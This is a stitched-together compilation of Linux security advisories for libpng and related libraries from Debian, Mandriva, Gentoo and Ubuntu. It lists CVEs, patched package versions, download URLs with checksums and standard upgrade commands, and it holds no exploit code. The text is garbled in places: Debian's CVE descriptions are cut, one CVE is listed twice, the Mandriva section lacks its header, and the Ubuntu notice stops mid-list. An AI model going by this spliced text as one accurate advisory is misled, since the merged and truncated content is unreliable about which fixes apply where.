Debian Security Advisory DSA-1750-1 security@debian.org http://www.debian.org/security/ Florian Weimer March 22, 2009 http://www.debian.org/security/faq
Package : libpng Vulnerability : several Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2007-2445 CVE-2007-5269 CVE-2008-1382 CVE-2008-5907 CVE-2008-6218 CVE-2009-0040 Debian Bug : 446308 476669 516256 512665
Several vulnerabilities have been discovered in libpng, a library for reading and writing PNG files. (CVE-2008-1382)
The png_check_keyword might allow context-dependent attackers to set the value of an arbitrary memory location to zero via vectors involving creation of crafted PNG files with keywords. (CVE-2009-0040)
For the old stable distribution (etch), these problems have been fixed in version1.2.15~beta5-1+etch2.
For the stable distribution (lenny), these problems have been fixed in version 1.2.27-2+lenny2. (Only CVE-2008-5907, CVE-2008-5907 and CVE-2009-0040 affect the stable distribution.)
For the unstable distribution (sid), these problems have been fixed in version 1.2.35-1.
We recommend that you upgrade your libpng packages.
Upgrade instructions
wget url will fetch the file for you dpkg -i file.deb will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:
apt-get update will update the internal database apt-get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 4.0 alias etch
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5.orig.tar.gz Size/MD5 checksum: 829038 77ca14fcee1f1f4daaaa28123bd0b22d http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.diff.gz Size/MD5 checksum: 18622 e1e1b7d74b9af5861bdcfc50154d2b4c http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.15~beta5-1+etch2.dsc Size/MD5 checksum: 1033 a0668aeec893b093e1f8f68316a04041
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.15~beta5-1+etch2_all.deb Size/MD5 checksum: 882 eb0e501247bd91837c090cf3353e07c6
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 214038 1dd9a6d646d8ae533fbabbb32e03149a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_alpha.deb Size/MD5 checksum: 204478 d04c5a2151ca4aa8b1fa6f1b3078e418 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_alpha.udeb Size/MD5 checksum: 85270 1fcfca5bfd47a2f6611074832273ac0b
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 188124 703758e444f77281b9104e20c358b521 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_amd64.deb Size/MD5 checksum: 179186 d2596f942999be2acb79e77d12d99c2e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_amd64.udeb Size/MD5 checksum: 69056 4bd8858ff3ef96c108d2f357e67c7b73
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_arm.udeb Size/MD5 checksum: 63714 14bd7b3fa29b01ebc18b6611eea486d1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 168764 54a349016bbdd6624fe8552bd951fee0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_arm.deb Size/MD5 checksum: 182720 79e501f9c79d31b0f9c8b5a4f16f6a2e
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_hppa.udeb Size/MD5 checksum: 74440 e240adb3f2b0f8ed35a3c2fe2dd35da1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 187052 e5f7162d516fc3d8e953726d7fb5b6ae http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_hppa.deb Size/MD5 checksum: 194360 83928ed4057deade50551874a6a85d27
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_i386.udeb Size/MD5 checksum: 67656 66d9d533e26e4f74fbdd01bf55fa40b1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 187710 20da5a533679aee19edf5cd0c339f2c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_i386.deb Size/MD5 checksum: 170784 b19d4f0f8be4d65dbb847079ce2effa8
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227792 eb01ade8e4b4dba3215832b8c632548a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_ia64.udeb Size/MD5 checksum: 108076 cb3ae7c7c66dcafce969608a437fdade http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_ia64.deb Size/MD5 checksum: 227388 83fa9e2ba1a370fe1b973688ab6096dd
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187814 daa3c7c3aeae294c661324528e0f6c3e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mips.deb Size/MD5 checksum: 187016 e556557c1c570c66656232422af38c8e http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mips.udeb Size/MD5 checksum: 67730 ae7ea1cd95eacae754ba35e9fae19818
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_mipsel.udeb Size/MD5 checksum: 67996 4be0aa40152ac55a7355aea2204d7888 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187852 19a6eddae81d4f9d768f8c0ef442b0ed http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_mipsel.deb Size/MD5 checksum: 187282 119ae6083edd419fed3fe970cc507919
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 178452 e48dc544abc3df3ec474930639e29469 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_powerpc.deb Size/MD5 checksum: 186636 b8319bb815dec618288cdd35cd37c191 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_powerpc.udeb Size/MD5 checksum: 67430 a3717e7c30011e60be99ce04983f2984
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 178548 790f01dc85511343a4ef9b4832f3b1fa http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_s390.deb Size/MD5 checksum: 190648 a79ea20f0b8af58765d2b14ec276aa5a http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_s390.udeb Size/MD5 checksum: 71438 aa83c3a2ab4da51670da3eafcedddac9
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.15~beta5-1+etch2_sparc.udeb Size/MD5 checksum: 64914 13bcdda845e00493e1b25413452302d0 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 184734 0f0e7865607948f07a604c86fd4f94bb http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.15~beta5-1+etch2_sparc.deb Size/MD5 checksum: 172558 2853d84c9f9823d0bfe77b1fca00348d
Debian GNU/Linux 5.0 alias lenny
Source archives:
http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.diff.gz Size/MD5 checksum: 16783 64d84ee2a3098905d361711dc96698c9 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27.orig.tar.gz Size/MD5 checksum: 783204 13a0de401db1972a8e68f47d5bdadd13 http://security.debian.org/pool/updates/main/libp/libpng/libpng_1.2.27-2+lenny2.dsc Size/MD5 checksum: 1492 8c82810267b23916b6207fa40f0b6bce
Architecture independent packages:
http://security.debian.org/pool/updates/main/libp/libpng/libpng3_1.2.27-2+lenny2_all.deb Size/MD5 checksum: 878 8d46f725bd49014cdb4e15508baea203
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 287802 470918bf3d543a1128df53d4bed78b3f http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_alpha.deb Size/MD5 checksum: 182372 df321c1623004da3cf1daacae952e8b6 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_alpha.udeb Size/MD5 checksum: 86746 975dccb76f777be09e8e5353704bf6bf
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_amd64.udeb Size/MD5 checksum: 71944 3f3bdfdee4699b4b3e5c793686330036 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 254598 122c139abf34eb461eca9847ec9dffe7 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_amd64.deb Size/MD5 checksum: 167190 1c17a5378b2e6b8fa8760847510f208b
arm architecture (ARM)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 245788 9d3fe182d56caad3f9d8a436ca109b57 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_arm.udeb Size/MD5 checksum: 64754 81ee041de30e2e5343d38965ab0645c1 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_arm.deb Size/MD5 checksum: 160222 5741adc357ec8f3f09c4c8e72f02ec88
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_armel.udeb Size/MD5 checksum: 67178 71747c7d6f7bffde46bb38055948b781 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 246680 bb9df968f72c62d5adceab0079c86e02 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_armel.deb Size/MD5 checksum: 163028 60bf255a23031c9c105d3582ed2c21bd
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 261298 a0bac6595474dc5778c764fab4acd9be http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_hppa.deb Size/MD5 checksum: 170170 de217ce54775d5f648ad369f4ce7cb72 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_hppa.udeb Size/MD5 checksum: 74124 affd4f1155bd1d571615b6c767886974
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_i386.udeb Size/MD5 checksum: 70314 865ea6726b205467e770d56d1530fdd2 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 165892 cfcd37b7eee72625d13f09328bc24e23 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_i386.deb Size/MD5 checksum: 247056 bc860a52608d966576f581c27e89a86c
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 305532 d6f329a47a523353fcd527c48abb078c http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_ia64.deb Size/MD5 checksum: 207604 78b003ade0b48d1510f436f2e5008588 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_ia64.udeb Size/MD5 checksum: 112070 a0f1e5e8a85bcc1995faa1e031f5e16e
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mips.udeb Size/MD5 checksum: 68198 a68e0ba1f7a39bd9984414f4160de5bc http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 262138 f3580912592abe14609134cab2242728 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mips.deb Size/MD5 checksum: 163666 0c9f75230c396553e6062eb397d6b95c
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 163956 dfda7e322af96e8ae5104cfd9f955e92 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_mipsel.udeb Size/MD5 checksum: 68468 9c357d2d831dca03ed0887c58a18c523 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_mipsel.deb Size/MD5 checksum: 262162 a1d0ba1b7adb92a95180e6d65b398b5b
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_powerpc.udeb Size/MD5 checksum: 70814 3053467f8b8864802cc7261742abfa00 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 166240 13acfd773d2a31bd555ac1936411fe95 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_powerpc.deb Size/MD5 checksum: 253322 d4a722d84e5c2f263d72a59dea00ce17
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 253696 bc748b49195dcd01b5288349e3e85510 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_s390.udeb Size/MD5 checksum: 73624 f35735be37fc376c56941795a185c742 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_s390.deb Size/MD5 checksum: 169052 4cf962619d634ea59a39d14c32134594
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0-udeb_1.2.27-2+lenny2_sparc.udeb Size/MD5 checksum: 66216 07bcad5c11908d2fe6d358dfc94d9051 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-dev_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 247212 f388365559e6b9313aa6048c6fa341f9 http://security.debian.org/pool/updates/main/libp/libpng/libpng12-0_1.2.27-2+lenny2_sparc.deb Size/MD5 checksum: 162316 16f01a96b1fec79e9614df831dba6a05
These files will probably be moved into the stable distribution on its next update.
The updated packages have been patched to correct this issue.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2445 http://www.cert.org/advisories/684664
Updated Packages:
Mandriva Linux 2007.0: 4483193885966f919f283594719a0a90 2007.0/i586/libpng3-1.2.12-2.3mdv2007.0.i586.rpm d13427f7a6494c82a8becec26aaa158f 2007.0/i586/libpng3-devel-1.2.12-2.3mdv2007.0.i586.rpm 86e2b902df20f46bbab8c198be7bb623 2007.0/i586/libpng3-static-devel-1.2.12-2.3mdv2007.0.i586.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm
Mandriva Linux 2007.0/X86_64: 80168137deb6e23d5a2fb6e8f3abc2ef 2007.0/x86_64/lib64png3-1.2.12-2.3mdv2007.0.x86_64.rpm b45baf5195b6ffd1d32b5829ff861b50 2007.0/x86_64/lib64png3-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 9e4f1d18db609adc5c2f92629814e360 2007.0/x86_64/lib64png3-static-devel-1.2.12-2.3mdv2007.0.x86_64.rpm 2351bce470227141eecf5a3adb303ce7 2007.0/SRPMS/libpng-1.2.12-2.3mdv2007.0.src.rpm
Mandriva Linux 2007.1: 300ed9a63f60a1ee16ce4e5caa71f96b 2007.1/i586/libpng3-1.2.13-2.1mdv2007.1.i586.rpm fdd3c3cefc587622382d37cd5fe2795e 2007.1/i586/libpng3-devel-1.2.13-2.1mdv2007.1.i586.rpm d6b13aa08877aec2aaf165203d2a6817 2007.1/i586/libpng3-static-devel-1.2.13-2.1mdv2007.1.i586.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64: f1289336b45eb58bc2975011086fbfa9 2007.1/x86_64/lib64png3-1.2.13-2.1mdv2007.1.x86_64.rpm 8dc0504ac8c6ed8e6c5f641c738df144 2007.1/x86_64/lib64png3-devel-1.2.13-2.1mdv2007.1.x86_64.rpm d0b9f63131ecbfe01db295d15903fd40 2007.1/x86_64/lib64png3-static-devel-1.2.13-2.1mdv2007.1.x86_64.rpm 00e882bf543c8730d656417304f3b4e1 2007.1/SRPMS/libpng-1.2.13-2.1mdv2007.1.src.rpm
Corporate 3.0: 9c0077ae596e6a2340ed6e08ab6c437c corporate/3.0/i586/libpng3-1.2.5-10.8.C30mdk.i586.rpm 2f44c9f5639aff57948b64cf845efa39 corporate/3.0/i586/libpng3-devel-1.2.5-10.8.C30mdk.i586.rpm e1638f0497b35341796bb74ccb5a95e7 corporate/3.0/i586/libpng3-static-devel-1.2.5-10.8.C30mdk.i586.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm
Corporate 3.0/X86_64: 632b1254a5b2ee4def5ac2f98bc7bd4c corporate/3.0/x86_64/lib64png3-1.2.5-10.8.C30mdk.x86_64.rpm b4ad3f3a34be89a22c7bdfcb8b9f351d corporate/3.0/x86_64/lib64png3-devel-1.2.5-10.8.C30mdk.x86_64.rpm 419f3faddaeb3cbfa3ca020630858682 corporate/3.0/x86_64/lib64png3-static-devel-1.2.5-10.8.C30mdk.x86_64.rpm 5905453feaf135e67bbdf4fecbc55335 corporate/3.0/SRPMS/libpng-1.2.5-10.8.C30mdk.src.rpm
Corporate 4.0: a444aa0f9b3c0e5bac0562b3274806a5 corporate/4.0/i586/libpng3-1.2.8-1.3.20060mlcs4.i586.rpm 25542984f9b920e9ab9197d383c201b9 corporate/4.0/i586/libpng3-devel-1.2.8-1.3.20060mlcs4.i586.rpm a0c238ea1c16f892b704b5055fcc340d corporate/4.0/i586/libpng3-static-devel-1.2.8-1.3.20060mlcs4.i586.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm
Corporate 4.0/X86_64: 2ff58096a6a2961e15719aa35107fda6 corporate/4.0/x86_64/lib64png3-1.2.8-1.3.20060mlcs4.x86_64.rpm 78ecdacb1033eecfbf48e464d3106bb1 corporate/4.0/x86_64/lib64png3-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 85ee7effc74676da27c1c2c1219b97a7 corporate/4.0/x86_64/lib64png3-static-devel-1.2.8-1.3.20060mlcs4.x86_64.rpm 9442bef36dbda9e9518ce367a7569d90 corporate/4.0/SRPMS/libpng-1.2.8-1.3.20060mlcs4.src.rpm
Multi Network Firewall 2.0: ea358d9ef4e412851f89abac96d015b7 mnf/2.0/i586/libpng3-1.2.5-10.8.M20mdk.i586.rpm 3068b2316e8225377b88dcaedbadb878 mnf/2.0/SRPMS/libpng-1.2.5-10.8.M20mdk.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFGZcKYmqjQ0CJFipgRAiL/AKDsmAXcJqycmwk5iMfPgWrV8Rl98gCgoeUN fefbLet+er8fbszmcgzIKUo= =rUB+ -----END PGP SIGNATURE-----
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201412-11
http://security.gentoo.org/
Severity: Normal Title: AMD64 x86 emulation base libraries: Multiple vulnerabilities Date: December 12, 2014 Bugs: #196865, #335508, #483632, #508322 ID: 201412-11
Synopsis
Multiple vulnerabilities have been found in AMD64 x86 emulation base libraries, the worst of which may allow remote execution of arbitrary code.
Background
AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-emulation/emul-linux-x86-baselibs < 20140406-r1 >= 20140406-r1
Description
Multiple vulnerabilities have been discovered in AMD64 x86 emulation base libraries. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All users of the AMD64 x86 emulation base libraries should upgrade to the latest version:
# emerge --sync # emerge -1av ">=app-emulation/emul-linux-x86-baselibs-20140406-r1"
NOTE: One or more of the issues described in this advisory have been fixed in previous updates. They are included in this advisory for the sake of completeness. It is likely that your system is already no longer affected by them.
References
[ 1 ] CVE-2007-0720 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0720 [ 2 ] CVE-2007-1536 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-1536 [ 3 ] CVE-2007-2026 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2026 [ 4 ] CVE-2007-2445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2445 [ 5 ] CVE-2007-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-2741 [ 6 ] CVE-2007-3108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3108 [ 7 ] CVE-2007-4995 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4995 [ 8 ] CVE-2007-5116 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5116 [ 9 ] CVE-2007-5135 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5135 [ 10 ] CVE-2007-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5266 [ 11 ] CVE-2007-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5268 [ 12 ] CVE-2007-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5269 [ 13 ] CVE-2007-5849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5849 [ 14 ] CVE-2010-1205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1205 [ 15 ] CVE-2013-0338 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0338 [ 16 ] CVE-2013-0339 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0339 [ 17 ] CVE-2013-1664 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1664 [ 18 ] CVE-2013-1969 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1969 [ 19 ] CVE-2013-2877 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2877 [ 20 ] CVE-2014-0160 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0160
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201412-11.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . =========================================================== Ubuntu Security Notice USN-472-1 June 11, 2007 libpng vulnerability CVE-2007-2445 ===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04
This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the following package versions:
Ubuntu 6.06 LTS: libpng12-0 1.2.8rel-5ubuntu0.2
Ubuntu 6.10: libpng12-0 1.2.8rel-5.1ubuntu0.2
Ubuntu 7.04: libpng12-0 1.2.15~beta5-1ubuntu1
After a standard system upgrade you need to reboot your computer to effect the necessary changes.
Details follow:
It was discovered that libpng did not correctly handle corrupted CRC in grayscale PNG images.
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.diff.gz
Size/MD5: 16483 713a6e035fa256e4cb822fb5fc88769b
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.2.dsc
Size/MD5: 652 bc4f3f785816684c54d62947d53bc0db
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.2_all.deb
Size/MD5: 846 76eab5d9a96efa186d66cf299a4f6032
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_amd64.udeb
Size/MD5: 69484 078e25586525c4e83abf08c736fa6bd8
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_amd64.deb
Size/MD5: 113888 46fce5d27ac4b2dea9cf4deb633f824e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_amd64.deb
Size/MD5: 247528 68879285068cda170eef5a5f56594a1c
i386 architecture (x86 compatible Intel/AMD)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_i386.udeb
Size/MD5: 66932 12cafbea44a3e7cf109eb24cb47aa557
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_i386.deb
Size/MD5: 111396 3a93335c2a072b2e2c94bc2cc0b3d77e
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_i386.deb
Size/MD5: 239662 64029c30dac5152c97e1a0d864c981d0
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_powerpc.udeb
Size/MD5: 66304 0cbf98391b6c3219f83cd24cefe0343c
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_powerpc.deb
Size/MD5: 110828 62c7a8ccc58c86414bcd170c394f8240
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_powerpc.deb
Size/MD5: 245220 1171c8638ec8ebc2c81f53706885b692
sparc architecture (Sun SPARC/UltraSPARC)
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.2_sparc.udeb
Size/MD5: 63824 e66313895e489a36c2f438343fa3e0d4
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.2_sparc.deb
Size/MD5: 108534 73ccb876f761c76b3518b8ca81e80485
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.2_sparc.deb
Size/MD5: 240048 5b19c41bbc639ee717fdacd4d81533e1
Updated packages for Ubuntu 6.10:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.diff.gz
Size/MD5: 16597 4ff19b636ab120a3fc4cee767171aa4f
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.2.dsc
Size/MD5: 659 5769690df3c57a56d08aa8bf11013a42
http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz
Size/MD5: 510681 cac1512878fb98f2456df6dc50bc9bc7
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.2_all.deb
Size/MD5: 888 44f3267b52e89fc605f350b4fc347e45
amd64 architecture (Athlon64, Opteron, EM64T Xeon)
